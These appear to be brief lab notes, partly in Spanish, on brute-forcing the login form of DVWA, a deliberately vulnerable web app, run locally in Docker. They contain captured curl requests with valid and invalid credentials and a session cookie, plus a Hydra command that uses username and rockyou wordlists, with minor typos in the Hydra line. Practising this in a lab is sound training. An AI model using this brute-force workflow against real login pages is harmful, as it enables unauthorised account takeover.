DVWA

docker pull vulnerables/web-dvwa
docker run --rm -it -p 2023:80 vulnerables/web-dvwa

cURL

valido

curl 'http://localhost:2023/vulnerabilities/brute/?username=admin&password=password&Login=Login' \
>   -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' \
>   -H 'Accept-Language: es-ES,es;q=0.9,en;q=0.8' \
>   -H 'Connection: keep-alive' \
>   -H 'Cookie: PHPSESSID=oc7u0skc909bvtn6btajbo93a2; security=low' \
>   -H 'Referer: http://localhost:2023/vulnerabilities/brute/?username=smithy&password=password&Login=Login' \
>   -H 'Sec-Fetch-Dest: document' \
>   -H 'Sec-Fetch-Mode: navigate' \
>   -H 'Sec-Fetch-Site: same-origin' \
>   -H 'Sec-Fetch-User: ?1' \
>   -H 'Upgrade-Insecure-Requests: 1' \
>   -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36' \
>   -H 'sec-ch-ua: "Chromium";v="116", "Not)A;Brand";v="24", "Google Chrome";v="116"' \
>   -H 'sec-ch-ua-mobile: ?0' \
>   -H 'sec-ch-ua-platform: "Linux"' \
>   --compressed

invalido

curl 'http://localhost:2023/vulnerabilities/brute/?username=a&password=a&Login=Login' \
>   -H 'Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7' \
>   -H 'Accept-Language: es-ES,es;q=0.9,en;q=0.8' \
>   -H 'Connection: keep-alive' \
>   -H 'Cookie: PHPSESSID=oc7u0skc909bvtn6btajbo93a2; security=low' \
>   -H 'Referer: http://localhost:2023/vulnerabilities/brute/?username=admin&password=password&Login=Login' \
>   -H 'Sec-Fetch-Dest: document' \
>   -H 'Sec-Fetch-Mode: navigate' \
>   -H 'Sec-Fetch-Site: same-origin' \
>   -H 'Sec-Fetch-User: ?1' \
>   -H 'Upgrade-Insecure-Requests: 1' \
>   -H 'User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/116.0.0.0 Safari/537.36' \
>   -H 'sec-ch-ua: "Chromium";v="116", "Not)A;Brand";v="24", "Google Chrome";v="116"' \
>   -H 'sec-ch-ua-mobile: ?0' \
>   -H 'sec-ch-ua-platform: "Linux"' \
>   --compressed

docker pull vanhauser/hydra
docker run vanhauser/hydra

-L usuarios.txt
-P rockyou_1.txt
"http-get-form://127.0.0.1:2023/vulnerabilities/ brute/:username=^USER^&password=^PASS^:H=Cookie\:
PHPSESSID=oc7u0skc909bvtn6btajbo93a2; security-low; :F-Username and/or password incorrect.
